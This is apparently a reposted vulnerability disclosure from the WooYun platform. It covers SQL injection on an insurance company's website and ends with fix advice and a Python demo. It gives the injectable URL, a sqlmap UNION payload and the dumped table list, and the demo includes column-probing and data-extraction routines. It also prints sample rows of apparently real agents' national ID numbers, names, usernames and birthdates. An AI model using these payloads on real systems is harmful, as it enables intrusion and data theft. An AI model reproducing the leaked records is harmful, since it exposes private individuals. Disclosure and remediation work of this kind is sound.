神刀安全网

Vulnerability title: SQL injection on the main site of Yangtze River Insurance (扬子江保险), a subsidiary of HNA Group (海航集团) (100,000 insurance agent records)

Vulnerability details

Disclosure status:

2016-04-18: Details reported to the vendor, awaiting the vendor's response
2016-04-18: Vendor confirmed the issue; details visible to the vendor only
2016-04-28: Details disclosed to core white hats and relevant domain experts
2016-05-08: Details disclosed to regular white hats
2016-05-18: Details disclosed to intern white hats
2016-06-02: Details disclosed to the public

Summary:

The main site of Yangtze River Insurance (扬子江保险), a subsidiary of HNA Group (海航集团), has a SQL injection vulnerability that exposes roughly 100,000 insurance agent records.

Details:

Site

http://www.yrib.com/

Injection point (the id parameter, passed by GET)

http://www.yrib.com/richsafe_getNewsDetailById.action?id=10

Proof:

sqlmap output. The hex literals inside CONCAT() are sqlmap's marker strings (0x7170717671 is 'qpqvq', 0x716b716b71 is 'qkqkq'); they wrap the value being extracted so the tool can locate it in the response, and the trailing '#' comments out the rest of the original query.

Code block
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=10' UNION ALL SELECT NULL,CONCAT(0x7170717671,0x5061765a76757a6e5275,0x716b716b71),NULL,NULL#
---
[10:34:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[10:34:39] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[10:34:39] [INFO] fetching tables for database: 'richsafe'
Database: richsafe
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| tbl_faagent | 105693 |
| tbl_faagentpost | 49359 |
| tbl_fdcom | 30563 |
| tbl_fdsyslog | 4329 |
| tbl_interfacelog | 2705 |
| tbl_interfacelogparas | 2705 |
| tbl_fdcounty | 2589 |
| tbl_occupationcode | 971 |
| tbl_fadistribution | 889 |
| tbl_flemployerins_track | 698 |
| tbl_fmcalmodepams | 666 |
| ldcode | 455 |
| tbl_fxinpersonins | 391 |
| tbl_fcinsured | 346 |
| tbl_fdcity | 340 |
| tbl_foorderdetail | 335 |
| tbl_fouserorder | 335 |
| tbl_fcappnt | 327 |
| tbl_fccont | 327 |
| tbl_fcpol | 312 |
| tbl_fcprojectplan | 258 |
| tbl_message | 257 |
| tbl_fcconttoplan | 256 |
| tbl_fdmenugrptomenu | 156 |
| tbl_easypaytype | 154 |
| tbl_fofxotoattach | 151 |
| tbl_dxsendrecord | 138 |
| tbl_fdmenu | 123 |
| tbl_fxmedicalapp_sf | 80 |
| tbl_easypayoinfo | 58 |
| tbl_fdplan | 58 |
| tbl_fduserlog | 49 |
| tbl_fdplantopro | 48 |
| ldmenu | 46 |
| tbl_fdplanrisk | 46 |
| seqmysql | 44 |
| tbl_fmsupplier | 40 |
| tbl_fdroletomenugrp | 39 |
| tbl_fmproductplan | 39 |
| tbl_fdmenugrp | 36 |
| tbl_fmcalmode | 35 |
| tbl_fdpriovince | 31 |
| ldtaskrunlog | 28 |
| tbl_dxlabelmgt | 28 |
| tbl_roadrescue | 21 |
| tbl_uploadinfo | 21 |
| ldtaskplanaudit | 18 |
| lduser | 16 |
| ldtaskaudit | 14 |
| tbl_fmriskapp | 14 |
| latestinformation | 11 |
| tbl_fxmedicalapp_jb_sf | 10 |
| tbl_lwuser | 10 |
| tbl_lp_attch | 9 |
| tbl_commentinfo | 7 |
| tbl_dxmoduleconfig | 7 |
| tbl_interfaceinfo | 7 |
| tbl_interfaceinfoparas | 7 |
| ldtask | 5 |
| ldtaskplan | 5 |
| tbl_fduser | 5 |
| companyglory | 4 |
| tbl_fdhrcom | 4 |
| tbl_fmproductdef | 3 |
| tbl_ldrole | 3 |
| `dual` | 2 |
| recruitmentinformation | 2 |
| tbl_fiaccpass | 2 |
| tbl_ficustomeracc | 1 |
+-------------------------+---------+

Code block (sample rows dumped through the injection; the column headers are missing from the capture and the last row is truncated)
| 110105196501140037 | NULL   | NULL     | 1000000014 | 1   | 胡杰               | NULL  | 1     | NULL  | NULL   | NULL   | NULL   | 11444   | hujie     | 2014-03-04 | 1965-01-14 | NULL     | 001      | 17:29:03 | NULL     | NULL      | NULL      | NULL      | 2014-05-29 | 2000-12-26 | NULL       | NULL       | 15:44:26   | NULL       | NULL       | NULL        | NULL        | NULL        | NULL        | NULL        | 16591       | NULL        | NULL         | NULL         | NULL         | NULL         | NULL         | NULL         | NULL         | NULL          | NULL          | NULL          | NULL          | NULL           | NULL            | NULL            | NULL              |
| 110102194412022719 | NULL | NULL | 1000000016 | 1 | 王东辉 | NULL | 1 | NULL | NULL | NULL | NULL | 177 | dhui_wang | 2014-03-04 | 1944-12-02 | NULL | 001 | 13:38:14 | NULL | NULL | NULL | NULL | 2014-05-29 | 2001-06-04 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 2 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 110105196203067716 | NULL | NULL | 1000000018 | 1 | 郭海涌 | NULL | 1 | NULL | NULL | NULL | NULL | 12000 | hy_guo | 2014-03-04 | 1962-03-06 | NULL | 001 | 13:18:50 | NULL | NULL | NULL | NULL | 2014-05-29 | 1995-03-30 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 9 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 11010119640701053x | NULL | NULL | 1000000019 | 1 | 房丽民 | NULL | 1 | NULL | NULL | NULL | NULL | 6277 | lm_fang | 2014-03-04 | 1964-07-01 | NULL | 001 | 11:47:16 | NULL | NULL | NULL | NULL | 2014-08-11 | 1995-04-01 | NULL | NULL | 16:09:29 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 6222 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 12011019550814037X | NULL | NULL | 1000000023 | 1 | 孟庆贵 | NULL | 1 | NULL | NULL | NULL | NULL | 11759 | qg_meng | 2014-03-04 | 1955-08-14 | NULL | 001 | 15:14:52 | NULL | NULL | NULL | NULL | 2014-05-29 | 1999-11-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 11683 | NULL | NULL | NULL

Fix:

Filter the input. Concretely, the id parameter is only ever an integer: reject any value that does not parse as one, and pass it to the database as a bound parameter (a PreparedStatement placeholder in the Java/Struts stack that the .action URL suggests) instead of concatenating it into the query string. Stripping quote characters on its own is not a fix for a UNION query injection, because the query structure is still built from user input.
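As an added example (not code from the report or from yrib.com), here is the vulnerable lookup behind an endpoint like richsafe_getNewsDetailById.action next to its hardened form, run against an in-memory SQLite database with constructed rows. Every table and column name except tbl_faagent is an assumption. The UNION payload from the proof section is adapted to SQLite syntax ('||' in place of CONCAT(), '-- ' in place of '#'), and the example also reproduces the step sqlmap reports as "4 columns": probing the column count until a UNION executes.

```python
import re
import sqlite3

# Added example, not code from the original report. Table and column names below are
# assumptions (the page shows only table names and row counts); the sample rows are
# constructed. The payload follows the report's MySQL UNION payload, adapted to SQLite:
# '||' replaces CONCAT() and '-- ' replaces '#' as the trailing comment.

# Vulnerable pattern: the id parameter is spliced into the SQL text.
NEWS_SQL_TEMPLATE = "SELECT id, title, body, published FROM news WHERE id = '{}'"


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, published TEXT);
        INSERT INTO news VALUES (10, 'Company news', 'Body text', '2016-04-18');
        CREATE TABLE tbl_faagent (idno TEXT, name TEXT, login TEXT, joined TEXT);
        INSERT INTO tbl_faagent VALUES ('110105XXXXXXXX0037', 'Agent One', 'agent1', '2014-03-04');
    """)
    return db


def vulnerable_news_detail(db, id_param):
    """Mirrors the reported endpoint: string concatenation, no validation."""
    return db.execute(NEWS_SQL_TEMPLATE.format(id_param)).fetchall()


class BadRequest(ValueError):
    pass


def safe_news_detail(db, id_param):
    """Hardened version: id must be a positive integer and is bound, not spliced."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", id_param):
        raise BadRequest("id must be a positive integer")
    return db.execute(
        "SELECT id, title, body, published FROM news WHERE id = ?", (int(id_param),)
    ).fetchall()


# sqlmap wraps the value it reads in random markers so it can find it in the page;
# the report's payload uses 0x7170717671 ('qpqvq') and 0x716b716b71 ('qkqkq').
MARK_L, MARK_R = "qpqvq", "qkqkq"


def probe_column_count(db, max_cols=8):
    """Find how many columns the original SELECT returns, as sqlmap does before a UNION."""
    for n in range(1, max_cols + 1):
        payload = "10' UNION ALL SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            vulnerable_news_detail(db, payload)
            return n
        except sqlite3.OperationalError:  # column count mismatch between the SELECTs
            continue
    return None


def union_read(db, expression, from_table, columns=4):
    """Read one expression from another table through the news query's result set."""
    cells = ["NULL"] * columns
    cells[1] = f"'{MARK_L}'||{expression}||'{MARK_R}'"  # the title column is TEXT, so use it
    payload = f"10' UNION ALL SELECT {','.join(cells)} FROM {from_table}-- "
    for row in vulnerable_news_detail(db, payload):
        for cell in row:
            if isinstance(cell, str) and cell.startswith(MARK_L) and cell.endswith(MARK_R):
                return cell[len(MARK_L):-len(MARK_R)]
    return None


def safe_rejects(db, payload):
    """True when the hardened lookup refuses the payload before it reaches the database."""
    try:
        safe_news_detail(db, payload)
    except BadRequest:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("columns:", probe_column_count(db))
    print("leaked:", union_read(db, "idno", "tbl_faagent"))
    print("hardened rejects payload:", safe_rejects(db, "10' UNION ALL SELECT NULL,NULL,NULL,NULL-- "))
```

The integer check alone would stop this particular payload, but the bound parameter is what makes the query safe regardless of what later passes validation; keep both, and keep the validation strict (a whitelist of the expected shape, not a blacklist of quote characters).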

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)
